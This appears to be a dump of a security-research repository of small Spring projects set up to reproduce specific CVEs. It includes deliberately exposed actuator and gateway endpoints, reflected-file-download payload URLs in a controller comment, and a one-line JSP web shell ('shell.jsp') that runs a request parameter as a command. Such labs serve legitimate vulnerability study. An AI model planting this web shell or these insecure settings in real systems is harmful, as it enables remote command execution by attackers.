20 | public @interface PrivateKeyIsValid {
21 | String message() default "{PrivateKeyIsValid.message}";
22 | Class[] groups() default {};
23 | Class[] payload() default {};
24 | }
25 |
--------------------------------------------------------------------------------
/CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/support/CredentialException.java:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2013-2015 the original author or authors.
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * http://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 |
17 | package org.springframework.cloud.config.server.support;
18 |
19 | /**
20 | * @author Don Laidlaw
21 | *
22 | */
23 | @SuppressWarnings("serial")
24 | public class CredentialException extends RuntimeException {
25 |
26 | /**
27 | *
28 | */
29 | public CredentialException(String message, Throwable cause) {
30 | super(message, cause);
31 | }
32 |
33 | }
34 |
--------------------------------------------------------------------------------
/CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/support/EnvironmentRepositoryProperties.java:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2018 the original author or authors.
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * http://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 | package org.springframework.cloud.config.server.support;
17 |
18 | /**
19 | * @author Dylan Roberts
20 | */
21 | public interface EnvironmentRepositoryProperties {
22 | void setOrder(int order);
23 | }
24 |
--------------------------------------------------------------------------------
/CVE-2019-3799/src/main/resources/META-INF/spring.factories:
--------------------------------------------------------------------------------
1 | # Bootstrap components
2 | org.springframework.cloud.bootstrap.BootstrapConfiguration=\
3 | org.springframework.cloud.config.server.bootstrap.ConfigServerBootstrapConfiguration,\
4 | org.springframework.cloud.config.server.config.EncryptionAutoConfiguration
5 |
6 | # Application listeners
7 | org.springframework.context.ApplicationListener=\
8 | org.springframework.cloud.config.server.bootstrap.ConfigServerBootstrapApplicationListener
9 |
10 | # Autoconfiguration
11 | org.springframework.boot.autoconfigure.EnableAutoConfiguration=\
12 | org.springframework.cloud.config.server.config.ConfigServerAutoConfiguration,\
13 | org.springframework.cloud.config.server.config.EncryptionAutoConfiguration
14 |
15 | org.springframework.boot.diagnostics.FailureAnalyzer=\
16 | org.springframework.cloud.config.server.diagnostics.GitUriFailureAnalyzer
17 |
--------------------------------------------------------------------------------
/CVE-2019-3799/src/main/resources/configserver.yml:
--------------------------------------------------------------------------------
1 | info:
2 | component: Config Server
3 | spring:
4 | application:
5 | name: configserver
6 | autoconfigure.exclude: org.springframework.boot.autoconfigure.jdbc.DataSourceAutoConfiguration
7 | jmx:
8 | default_domain: cloud.config.server
9 | cloud:
10 | config:
11 | server:
12 | git:
13 | uri: https://github.com/spring-cloud-samples/config-repo
14 | repos:
15 | - patterns: multi-repo-demo-*
16 | uri: https://github.com/spring-cloud-samples/config-repo
17 |
18 | server:
19 | port: 8888
20 | management:
21 | context_path: /admin
22 |
--------------------------------------------------------------------------------
/CVE-2020-5398/HELP.md:
--------------------------------------------------------------------------------
1 | # Getting Started
2 |
3 | ### Reference Documentation
4 | For further reference, please consider the following sections:
5 |
6 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html)
7 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.6.9/maven-plugin/reference/html/)
8 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.6.9/maven-plugin/reference/html/#build-image)
9 |
10 |
--------------------------------------------------------------------------------
/CVE-2020-5398/src/main/java/com/example/demo/DemoApplication.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.springframework.boot.SpringApplication;
4 | import org.springframework.boot.autoconfigure.SpringBootApplication;
5 |
6 | @SpringBootApplication
7 | public class DemoApplication {
8 |
9 | public static void main(String[] args) {
10 | SpringApplication.run(DemoApplication.class, args);
11 | }
12 |
13 | }
14 |
--------------------------------------------------------------------------------
/CVE-2020-5398/src/main/resources/application.properties:
--------------------------------------------------------------------------------
1 | server.address=10.128.5.250
2 | server.port=8099
3 |
--------------------------------------------------------------------------------
/CVE-2020-5398/src/test/java/com/example/demo/DemoApplicationTests.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.junit.jupiter.api.Test;
4 | import org.springframework.boot.test.context.SpringBootTest;
5 |
6 | @SpringBootTest
7 | class DemoApplicationTests {
8 |
9 | @Test
10 | void contextLoads() {
11 | }
12 |
13 | }
14 |
--------------------------------------------------------------------------------
/CVE-2020-5398/target/classes/application.properties:
--------------------------------------------------------------------------------
1 | server.address=10.128.5.250
2 | server.port=8099
3 |
--------------------------------------------------------------------------------
/CVE-2020-5398/target/classes/com/example/demo/DemoApplication.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2020-5398/target/classes/com/example/demo/DemoApplication.class
--------------------------------------------------------------------------------
/CVE-2020-5398/target/classes/com/example/demo/MainController.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2020-5398/target/classes/com/example/demo/MainController.class
--------------------------------------------------------------------------------
/CVE-2020-5398/target/test-classes/com/example/demo/DemoApplicationTests.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2020-5398/target/test-classes/com/example/demo/DemoApplicationTests.class
--------------------------------------------------------------------------------
/CVE-2020-5412/src/main/java/com/org/example/HystrixDashboardApplication.java:
--------------------------------------------------------------------------------
1 | package com.org.example;
2 |
3 | import org.springframework.boot.SpringApplication;
4 | import org.springframework.boot.autoconfigure.SpringBootApplication;
5 | import org.springframework.cloud.netflix.hystrix.dashboard.EnableHystrixDashboard;
6 |
7 | @EnableHystrixDashboard
8 | @SpringBootApplication
9 | public class HystrixDashboardApplication {
10 |
11 | public static void main(String[] args) {
12 | SpringApplication.run(HystrixDashboardApplication.class, args);
13 | }
14 | }
15 |
--------------------------------------------------------------------------------
/CVE-2020-5412/src/main/resources/bootstrap.properties:
--------------------------------------------------------------------------------
1 | spring.application.name=hystrix-dashboard
2 | #spring.cloud.config.uri=http://localhost:8888
3 | server.address=10.128.5.250
4 | server.port=8099
--------------------------------------------------------------------------------
/CVE-2020-5412/src/test/java/com/org/example/HystrixDashboardApplicationTests.java:
--------------------------------------------------------------------------------
1 | package com.org.example;
2 |
3 | import org.junit.Test;
4 | import org.junit.runner.RunWith;
5 | import org.springframework.boot.test.context.SpringBootTest;
6 | import org.springframework.test.context.junit4.SpringRunner;
7 |
8 | @RunWith(SpringRunner.class)
9 | @SpringBootTest
10 | public class HystrixDashboardApplicationTests {
11 |
12 | @Test
13 | public void contextLoads() {
14 | }
15 |
16 | }
17 |
--------------------------------------------------------------------------------
/CVE-2020-5412/target/classes/bootstrap.properties:
--------------------------------------------------------------------------------
1 | spring.application.name=hystrix-dashboard
2 | #spring.cloud.config.uri=http://localhost:8888
3 | server.address=10.128.5.250
4 | server.port=8099
--------------------------------------------------------------------------------
/CVE-2020-5412/target/classes/com/org/example/HystrixDashboardApplication.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2020-5412/target/classes/com/org/example/HystrixDashboardApplication.class
--------------------------------------------------------------------------------
/CVE-2020-5412/target/test-classes/com/org/example/HystrixDashboardApplicationTests.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2020-5412/target/test-classes/com/org/example/HystrixDashboardApplicationTests.class
--------------------------------------------------------------------------------
/CVE-2020-5421/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 | 4.0.0
6 |
7 | org.example
8 | CVE-2020-5421
9 | 1.0-SNAPSHOT
10 |
11 |
12 | org.springframework.boot
13 | spring-boot-starter-parent
14 | 2.1.7.RELEASE
15 |
16 |
17 |
18 |
19 | org.springframework.boot
20 | spring-boot-starter-web
21 |
22 |
23 |
24 |
25 |
--------------------------------------------------------------------------------
/CVE-2020-5421/src/main/java/com/org/example/SpringBootApplication.java:
--------------------------------------------------------------------------------
1 | package com.org.example;
2 |
3 | import org.springframework.boot.SpringApplication;
4 |
5 | @org.springframework.boot.autoconfigure.SpringBootApplication
6 | public class SpringBootApplication {
7 | public static void main(String[] args) {
8 | SpringApplication.run(SpringBootApplication.class,args);
9 | }
10 | }
11 |
--------------------------------------------------------------------------------
/CVE-2020-5421/src/main/java/com/org/example/config/FilterConfig.java:
--------------------------------------------------------------------------------
1 | package com.org.example.config;
2 |
3 | import com.org.example.filter.SpringJsessionidRdfFilter;
4 | import org.springframework.boot.web.servlet.FilterRegistrationBean;
5 | import org.springframework.context.annotation.Bean;
6 | import org.springframework.context.annotation.Configuration;
7 |
8 | //@Configuration
9 | public class FilterConfig {
10 | // @Bean
11 | public FilterRegistrationBean registerAuthFilter() {
12 | FilterRegistrationBean registration = new FilterRegistrationBean();
13 | registration.setFilter(new SpringJsessionidRdfFilter());
14 | registration.addUrlPatterns("/*");
15 | registration.setName("rdfFilter");
16 | registration.setOrder(1);
17 | return registration;
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/CVE-2020-5421/src/main/java/com/org/example/controller/TestController.java:
--------------------------------------------------------------------------------
1 | package com.org.example.controller;
2 |
3 | import org.springframework.stereotype.Controller;
4 | import org.springframework.web.bind.annotation.RequestMapping;
5 | import org.springframework.web.bind.annotation.ResponseBody;
6 |
7 | @Controller
8 | @RequestMapping(value = "rfd")
9 | public class TestController {
10 |
11 | // localhost:8080/rfd/content?content=hello
12 | // localhost:8080/rfd/;jsessionid=/content.sh?content=%23!%2Fbin%2Fbash%0Aid
13 | // localhost:8080/rfd/;jsessionid=/content.bat?content=calc
14 | @RequestMapping("content")
15 | @ResponseBody
16 | public String input(String content){
17 | return content;
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/CVE-2020-5421/src/main/resources/application.properties:
--------------------------------------------------------------------------------
1 | spring.mvc.pathmatch.use-suffix-pattern=true
2 | spring.mvc.contentnegotiation.favor-path-extension=true
3 | server.address=10.128.5.250
4 | server.port=8099
--------------------------------------------------------------------------------
/CVE-2020-5421/target/classes/application.properties:
--------------------------------------------------------------------------------
1 | spring.mvc.pathmatch.use-suffix-pattern=true
2 | spring.mvc.contentnegotiation.favor-path-extension=true
3 | server.address=10.128.5.250
4 | server.port=8099
--------------------------------------------------------------------------------
/CVE-2020-5421/target/classes/com/org/example/SpringBootApplication.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2020-5421/target/classes/com/org/example/SpringBootApplication.class
--------------------------------------------------------------------------------
/CVE-2020-5421/target/classes/com/org/example/config/FilterConfig.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2020-5421/target/classes/com/org/example/config/FilterConfig.class
--------------------------------------------------------------------------------
/CVE-2020-5421/target/classes/com/org/example/controller/TestController.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2020-5421/target/classes/com/org/example/controller/TestController.class
--------------------------------------------------------------------------------
/CVE-2020-5421/target/classes/com/org/example/filter/SpringJsessionidRdfFilter.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2020-5421/target/classes/com/org/example/filter/SpringJsessionidRdfFilter.class
--------------------------------------------------------------------------------
/CVE-2021-21234/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM openjdk:8-jdk-alpine
2 | MAINTAINER baeldung.com
3 | COPY target/spring-boot-hello-world-example-0.0.1-SNAPSHOT.jar app.jar
4 | ENTRYPOINT ["java","-jar","/app.jar"]
5 | EXPOSE 8887
6 | RUN mkdir -p ~/sping.log
--------------------------------------------------------------------------------
/CVE-2021-21234/src/main/java/com/boraji/tutorial/springboot/MainApp.java:
--------------------------------------------------------------------------------
1 | package com.boraji.tutorial.springboot;
2 |
3 | import org.springframework.boot.SpringApplication;
4 | import org.springframework.boot.autoconfigure.SpringBootApplication;
5 |
6 | @SpringBootApplication
7 | public class MainApp {
8 | public static void main(String[] args) {
9 | SpringApplication.run(MainApp.class, args);
10 | }
11 | }
12 |
--------------------------------------------------------------------------------
/CVE-2021-21234/src/main/java/com/boraji/tutorial/springboot/controller/HelloWorldController.java:
--------------------------------------------------------------------------------
1 | package com.boraji.tutorial.springboot.controller;
2 |
3 | import org.springframework.web.bind.annotation.RequestMapping;
4 | import org.springframework.web.bind.annotation.RestController;
5 |
6 | @RestController
7 | public class HelloWorldController {
8 | @RequestMapping("/")
9 | public String sayHello() {
10 | return "Hello Spring Boot!!";
11 | }
12 | }
13 |
--------------------------------------------------------------------------------
/CVE-2021-21234/src/main/resources/application.properties:
--------------------------------------------------------------------------------
1 | server.port=8887
2 | logging.path=spring.log
3 | endpoints.actuator.enabled=true
4 | management.context-path=/manage
5 | management.security.enabled=false
--------------------------------------------------------------------------------
/CVE-2021-21234/target/classes/application.properties:
--------------------------------------------------------------------------------
1 | server.port=8887
2 | logging.path=spring.log
3 | endpoints.actuator.enabled=true
4 | management.context-path=/manage
5 | management.security.enabled=false
--------------------------------------------------------------------------------
/CVE-2021-21234/target/classes/com/boraji/tutorial/springboot/MainApp.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2021-21234/target/classes/com/boraji/tutorial/springboot/MainApp.class
--------------------------------------------------------------------------------
/CVE-2021-21234/target/classes/com/boraji/tutorial/springboot/controller/HelloWorldController.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2021-21234/target/classes/com/boraji/tutorial/springboot/controller/HelloWorldController.class
--------------------------------------------------------------------------------
/CVE-2021-22053/HELP.md:
--------------------------------------------------------------------------------
1 | # Getting Started
2 |
3 | ### Reference Documentation
4 | For further reference, please consider the following sections:
5 |
6 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html)
7 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.7.1/maven-plugin/reference/html/)
8 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.7.1/maven-plugin/reference/html/#build-image)
9 | * [Eureka Server](https://docs.spring.io/spring-cloud-netflix/docs/current/reference/html/#spring-cloud-eureka-server)
10 |
11 | ### Guides
12 | The following guides illustrate how to use some features concretely:
13 |
14 | * [Service Registration and Discovery with Eureka and Spring Cloud](https://spring.io/guides/gs/service-registration-and-discovery/)
15 |
16 |
--------------------------------------------------------------------------------
/CVE-2021-22053/src/main/java/com/example/demo/DemoApplication.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.springframework.boot.SpringApplication;
4 | import org.springframework.boot.autoconfigure.SpringBootApplication;
5 | import org.springframework.cloud.netflix.hystrix.dashboard.EnableHystrixDashboard;
6 |
7 | @EnableHystrixDashboard
8 | @SpringBootApplication
9 | public class DemoApplication {
10 |
11 | public static void main(String[] args) {
12 | SpringApplication.run(DemoApplication.class, args);
13 | }
14 |
15 | }
16 |
--------------------------------------------------------------------------------
/CVE-2021-22053/src/main/resources/application.properties:
--------------------------------------------------------------------------------
1 | server.address=10.128.5.250
2 | server.port=8099
3 |
--------------------------------------------------------------------------------
/CVE-2021-22053/src/test/java/com/example/demo/DemoApplicationTests.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.junit.jupiter.api.Test;
4 | import org.springframework.boot.test.context.SpringBootTest;
5 |
6 | @SpringBootTest
7 | class DemoApplicationTests {
8 |
9 | @Test
10 | void contextLoads() {
11 | }
12 |
13 | }
14 |
--------------------------------------------------------------------------------
/CVE-2021-22053/target/classes/application.properties:
--------------------------------------------------------------------------------
1 | server.address=10.128.5.250
2 | server.port=8099
3 |
--------------------------------------------------------------------------------
/CVE-2021-22053/target/classes/com/example/demo/DemoApplication.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2021-22053/target/classes/com/example/demo/DemoApplication.class
--------------------------------------------------------------------------------
/CVE-2021-22053/target/test-classes/com/example/demo/DemoApplicationTests.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2021-22053/target/test-classes/com/example/demo/DemoApplicationTests.class
--------------------------------------------------------------------------------
/CVE-2022-22947/HELP.md:
--------------------------------------------------------------------------------
1 | # Getting Started
2 |
3 | ### Reference Documentation
4 | For further reference, please consider the following sections:
5 |
6 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html)
7 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.7.1/maven-plugin/reference/html/)
8 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.7.1/maven-plugin/reference/html/#build-image)
9 | * [Gateway](https://docs.spring.io/spring-cloud-gateway/docs/current/reference/html/)
10 |
11 | ### Guides
12 | The following guides illustrate how to use some features concretely:
13 |
14 | * [Using Spring Cloud Gateway](https://github.com/spring-cloud-samples/spring-cloud-gateway-sample)
15 |
16 |
--------------------------------------------------------------------------------
/CVE-2022-22947/src/main/java/com/example/demo/DemoApplication.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.springframework.boot.SpringApplication;
4 | import org.springframework.boot.autoconfigure.SpringBootApplication;
5 | import org.springframework.cloud.gateway.route.RouteLocator;
6 | import org.springframework.cloud.gateway.route.builder.RouteLocatorBuilder;
7 | import org.springframework.context.annotation.Bean;
8 | import org.springframework.web.bind.annotation.RequestMapping;
9 | import org.springframework.web.bind.annotation.RestController;
10 |
11 | @SpringBootApplication
12 | @RestController
13 | public class DemoApplication {
14 |
15 | @RequestMapping("/")
16 | public String root() {
17 | return "Gateway Up and Running!";
18 | }
19 |
20 | @Bean
21 | RouteLocator testRouteLocator(RouteLocatorBuilder routeLocatorBuilder) {
22 | return routeLocatorBuilder.routes()
23 | .route("test", r -> r.path("/test/**").filters(f -> f.rewritePath("/test(?.*)", "/${path}")).uri("https://www.google.com"))
24 | .route("get", r -> r.path("/get/**").filters(f -> f.addRequestHeader("X-Gateway-Test", "Foo")).uri("https://httpbin.org")).build();
25 | }
26 |
27 | public static void main(String[] args) {
28 | SpringApplication.run(DemoApplication.class, args);
29 | }
30 |
31 | }
32 |
--------------------------------------------------------------------------------
/CVE-2022-22947/src/main/resources/application.properties:
--------------------------------------------------------------------------------
1 | spring.application.name=gateway-demo
2 | server.port=9000
3 | server.address=10.128.5.250
4 | management.endpoint.gateway.enabled=true
5 | management.endpoints.web.exposure.include=gateway
6 |
7 | #management.endpoints.web.exposure.exclude="*"
8 | #spring.cloud.gateway.routes-id=index
9 | #spring.cloud.gateway.routes-uri=http://example.com
10 | #spring.cloud.gateway.routes-predicates=Method=GET
11 |
--------------------------------------------------------------------------------
/CVE-2022-22947/src/main/resources/application.yaml:
--------------------------------------------------------------------------------
1 | #spring:
2 | # cloud:
3 | # gateway:
4 | # routes:
5 | # - id: after_route
6 | # uri: https://example.org
7 | # predicates:
8 | # - Cookie=mycookie,mycookievalue
9 |
10 | #spring:
11 | # cloud:
12 | # gateway:
13 | # routes:
14 | # - id: after_route
15 | # uri: https://example.org
16 | # predicates:
17 | # - name: Cookie
18 | # args:
19 | # name: mycookie
20 | # regexp: mycookievalue
21 | #
22 | management:
23 | endpoints:
24 | web:
25 | exposure:
26 | include: "*"
27 |
28 | spring:
29 | cloud:
30 | gateway:
31 | routes:
32 | - id: index
33 | uri: http://example.com
34 | predicates:
35 | - Method=GET
--------------------------------------------------------------------------------
/CVE-2022-22947/src/test/java/com/example/demo/DemoApplicationTests.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.junit.jupiter.api.Test;
4 | import org.springframework.boot.test.context.SpringBootTest;
5 |
6 | @SpringBootTest
7 | class DemoApplicationTests {
8 |
9 | @Test
10 | void contextLoads() {
11 | }
12 |
13 | }
14 |
--------------------------------------------------------------------------------
/CVE-2022-22947/target/classes/application.properties:
--------------------------------------------------------------------------------
1 | spring.application.name=gateway-demo
2 | server.port=9000
3 | server.address=10.128.5.250
4 | management.endpoint.gateway.enabled=true
5 | management.endpoints.web.exposure.include=gateway
6 |
7 | #management.endpoints.web.exposure.exclude="*"
8 | #spring.cloud.gateway.routes-id=index
9 | #spring.cloud.gateway.routes-uri=http://example.com
10 | #spring.cloud.gateway.routes-predicates=Method=GET
11 |
--------------------------------------------------------------------------------
/CVE-2022-22947/target/classes/application.yaml:
--------------------------------------------------------------------------------
1 | #spring:
2 | # cloud:
3 | # gateway:
4 | # routes:
5 | # - id: after_route
6 | # uri: https://example.org
7 | # predicates:
8 | # - Cookie=mycookie,mycookievalue
9 |
10 | #spring:
11 | # cloud:
12 | # gateway:
13 | # routes:
14 | # - id: after_route
15 | # uri: https://example.org
16 | # predicates:
17 | # - name: Cookie
18 | # args:
19 | # name: mycookie
20 | # regexp: mycookievalue
21 | #
22 | management:
23 | endpoints:
24 | web:
25 | exposure:
26 | include: "*"
27 |
28 | spring:
29 | cloud:
30 | gateway:
31 | routes:
32 | - id: index
33 | uri: http://example.com
34 | predicates:
35 | - Method=GET
--------------------------------------------------------------------------------
/CVE-2022-22947/target/classes/com/example/demo/DemoApplication.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22947/target/classes/com/example/demo/DemoApplication.class
--------------------------------------------------------------------------------
/CVE-2022-22947/target/test-classes/com/example/demo/DemoApplicationTests.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22947/target/test-classes/com/example/demo/DemoApplicationTests.class
--------------------------------------------------------------------------------
/CVE-2022-22963/HELP.md:
--------------------------------------------------------------------------------
1 | # Getting Started
2 |
3 | ### Reference Documentation
4 | For further reference, please consider the following sections:
5 |
6 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html)
7 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.7.1/maven-plugin/reference/html/)
8 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.7.1/maven-plugin/reference/html/#build-image)
9 | * [Function](https://docs.spring.io/spring-cloud-function/docs/current/reference/html/spring-cloud-function.html)
10 |
11 | ### Additional Links
12 | These additional references should also help you:
13 |
14 | * [Various sample apps using Spring Cloud Function](https://github.com/spring-cloud/spring-cloud-function/tree/main/spring-cloud-function-samples)
15 |
16 |
--------------------------------------------------------------------------------
/CVE-2022-22963/src/main/java/com/example/demo/DemoApplication.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.springframework.boot.SpringApplication;
4 | import org.springframework.boot.autoconfigure.SpringBootApplication;
5 |
6 | @SpringBootApplication
7 | public class DemoApplication {
8 |
9 | public static void main(String[] args) {
10 | SpringApplication.run(DemoApplication.class, args);
11 | }
12 |
13 | }
14 |
--------------------------------------------------------------------------------
/CVE-2022-22963/src/main/java/com/example/demo/TestController.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.springframework.web.bind.annotation.RequestMapping;
4 | import org.springframework.web.bind.annotation.RestController;
5 |
6 | @RestController
7 | public class TestController {
8 | @RequestMapping("/")
9 | String home() {
10 | return "hello axisx";
11 | }
12 | }
13 |
--------------------------------------------------------------------------------
/CVE-2022-22963/src/main/resources/application.properties:
--------------------------------------------------------------------------------
1 | server.address=10.128.5.250
2 | server.port=8089
3 |
--------------------------------------------------------------------------------
/CVE-2022-22963/src/test/java/com/example/demo/DemoApplicationTests.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.junit.jupiter.api.Test;
4 | import org.springframework.boot.test.context.SpringBootTest;
5 |
6 | @SpringBootTest
7 | class DemoApplicationTests {
8 |
9 | @Test
10 | void contextLoads() {
11 | }
12 |
13 | }
14 |
--------------------------------------------------------------------------------
/CVE-2022-22963/target/classes/application.properties:
--------------------------------------------------------------------------------
1 | server.address=10.128.5.250
2 | server.port=8089
3 |
--------------------------------------------------------------------------------
/CVE-2022-22963/target/classes/com/example/demo/DemoApplication.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22963/target/classes/com/example/demo/DemoApplication.class
--------------------------------------------------------------------------------
/CVE-2022-22963/target/classes/com/example/demo/TestController.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22963/target/classes/com/example/demo/TestController.class
--------------------------------------------------------------------------------
/CVE-2022-22963/target/test-classes/com/example/demo/DemoApplicationTests.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22963/target/test-classes/com/example/demo/DemoApplicationTests.class
--------------------------------------------------------------------------------
/CVE-2022-22965/src/main/java/org/axisx/SpringRCEDemo/GlobalFilter.java:
--------------------------------------------------------------------------------
1 | package org.axisx.SpringRCEDemo;
2 |
3 | import org.springframework.core.annotation.Order;
4 | import org.springframework.web.bind.WebDataBinder;
5 | import org.springframework.web.bind.annotation.ControllerAdvice;
6 | import org.springframework.web.bind.annotation.InitBinder;
7 |
8 | /*
9 | * 一种修复方案,在全局过滤掉class相关的参数
10 | * */
11 | //@ControllerAdvice
12 | //@Order(10000)
13 | //public class GlobalFilter {
14 | //
15 | // @InitBinder
16 | // public void setAllowFields(WebDataBinder dataBinder) {
17 | // dataBinder.setDisallowedFields(new String[]{"class.*"});
18 | // }
19 | //}
20 |
--------------------------------------------------------------------------------
/CVE-2022-22965/src/main/java/org/axisx/SpringRCEDemo/HelloController.java:
--------------------------------------------------------------------------------
1 | package org.axisx.SpringRCEDemo;
2 |
3 | import org.springframework.stereotype.Controller;
4 | import org.springframework.web.bind.annotation.RequestMapping;
5 | import org.springframework.web.bind.annotation.ResponseBody;
6 |
7 | @Controller
8 | public class HelloController {
9 |
10 | @RequestMapping("/hello")
11 | @ResponseBody
12 | public String hello(User user) {
13 | return "hello" + user.getName() + "!";
14 | }
15 | }
16 |
--------------------------------------------------------------------------------
/CVE-2022-22965/src/main/java/org/axisx/SpringRCEDemo/User.java:
--------------------------------------------------------------------------------
1 | package org.axisx.SpringRCEDemo;
2 |
3 | public class User {
4 |
5 | private String name;
6 |
7 | private int age;
8 |
9 | public User() {
10 | }
11 |
12 | public String getName() {
13 | return name;
14 | }
15 |
16 | public void setName(String name) {
17 | this.name = name;
18 | }
19 |
20 | public int getAge() {
21 | return age;
22 | }
23 |
24 | public void setAge(int age) {
25 | this.age = age;
26 | }
27 |
28 | @Override
29 | public String toString() {
30 | return "User{" +
31 | "name='" + name + '\'' +
32 | ", age=" + age +
33 | '}';
34 | }
35 | }
36 |
--------------------------------------------------------------------------------
/CVE-2022-22965/src/main/webapp/index.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8" %>
2 |
3 |
4 |
5 | JSP - Hello World
6 |
7 |
8 | <%= "Hello World!" %>
9 |
10 |
11 | Hello Servlet
12 |
13 |
--------------------------------------------------------------------------------
/CVE-2022-22965/src/main/webapp/shell.jsp:
--------------------------------------------------------------------------------
1 | <%=Runtime.getRuntime().exec(request.getParameter("cmd"))%>
2 |
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT.war
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/classes/org/axisx/SpringRCEDemo/GlobalFilter.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/classes/org/axisx/SpringRCEDemo/GlobalFilter.class
--------------------------------------------------------------------------------
